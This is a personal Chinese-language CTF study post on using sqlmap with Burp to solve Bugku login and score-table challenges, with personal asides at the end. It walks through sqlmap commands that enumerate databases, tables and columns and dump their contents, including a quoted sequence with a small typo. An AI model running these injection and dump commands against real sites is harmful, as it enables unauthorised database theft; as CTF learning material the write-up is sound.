[bugku]sqlmap部分
例題目錄
[根據校賽的經驗來看的話 這種登錄的可以先用sqlmap搞一下....]
然後做一個新的web題目 可以先給自己預留5min看會不會解, 不要上來就翻答案n
就5min, 可以兩個題,先做題,再補題。
其他的,在哪裏學習可以換地方,早點起吧,不要讓思維僵化了
例題1:這是一個神奇的登錄框
sqlmap要結合burp一起使用;
首先啊是抓包,然後保存下來到txt裏(直接burp抓了右鍵copy to file 就好了)
然後開始使用sqlmap(直接在我桌面上就有那個文件)
sqlmap.py -r "D:\1.txt" -p admin_name --dbs
解釋一下 -r是讀文件 後面是剛才保存的絕對路徑,-p是參數,也就是註入點(選了admin_name是註入點) --dbs意思是想獲取數據庫名字
(admin_name 是在源代碼裏面找到的..)
(我那個是bat文件 所以要加一個"python")
多試驗一下吧,一路選擇“Y”,開始並不行,最後好像還是可了:
我們來重復一下那個命令: python sqlmap.py -r "......\05.txt" -p admin_name --dbs
然後繼續包bugkusql1這個表
sqlmap.py -r "D:\1.txt" -D bugkusql1 -p admin_name --tables
解釋:-D是表示選擇了後面的這個數據庫 --tables是想獲取表
還記得嗎 -p 是參數的意思
很快找到兩個表
繼續 sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --columns
解釋類似上面 不過加了一個-T 指定表 (在表裏面繼續找adin_name)
這樣的話哇 哇
flag1這個列 最後查字段 命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
解釋:同上面 --dump是獲取字段的命令
【關系】數據庫--dbs(-D) 到 表名 --tables (-T) 到列名 --columns (-C) 最後--dump
然後命令的話直接回車
哇 然後就對了...... 還是很神奇的
例題2: 成績單
……? 以前寫過? 還寫了博客?完全不記得了.....
再重新來一遍吧....
好 於是一樣的話: python sqlmap.py -r "C:\Users\mol74\Desktop\hacku\1022.txt" -p id --dbs( 因為在源代碼裏那個是id )
找到了那個什麽 
這個是數據庫 繼續-d
[(改這倆地方就好啦)【修改的時候 -D (數據庫名字) 後面是 --tables】(真的1 後面就是表了 然後列... )
註意縮進 python裏面用的就是嚴格的縮進 然後就是這裏起碼你空格要搞對 才能區分開鴨 )
媽也 感覺是一樣的套路....
然後後面大部分選擇yes吧.... (這比javaweb要簡單吧 我tm)....
後面好像有點慢.... 然後 wtm no found
後面似乎就不行了....哇 然後發現是因為我zz 表名字寫錯了
不然怎麽可能找不到呢?前面表示在這個表裏面 再找直接就好了哇
最後直接dump 到手 哇嘎嘎嘎嘎嘎嘎嘎!
有兩個表啊 自己判斷在哪裏
====別人的:
2.依次執行如下命令,得到最終的結果:
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt //判斷是否存在SQL註入漏洞
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt --current-db //查詢當前數據庫
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt -D skctf --tables //查詢**數據庫有哪些數據表
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt -D skctf -T fl4g --columns //查詢**數據庫**數據表有哪些列
sqlmap.py -r C:\Users\ICBC\Desktop\post.txt -D skctf -T fl4g C skctf_flag --dump //查詢**數據庫**數據表**列的內容
---------------------
這裏寫錯了... 那個是skctf_flag
原文:https://blog.csdn.net/johnlxj/article/details/82153355
https://blog.csdn.net/qq_40424939/article/details/80775500?utm_source=blogxgwz2
這裏整理的很好.. 我也不想學了 好累
----------題外話
我覺得acm當時對我來說真的很痛苦的吧
劃水的時間太長 錯一點小地方 然後總是那個想修修補補 而不是重新開始的心態 什麽都寫的很慢
我也最多在題意和xx上蹦跶了 當個散戶的話鍛煉腦子 沒事的時候鼓搗一下也挺好 w
就這樣吧 不放棄 還能幹嗎
[bugku]sqlmap部分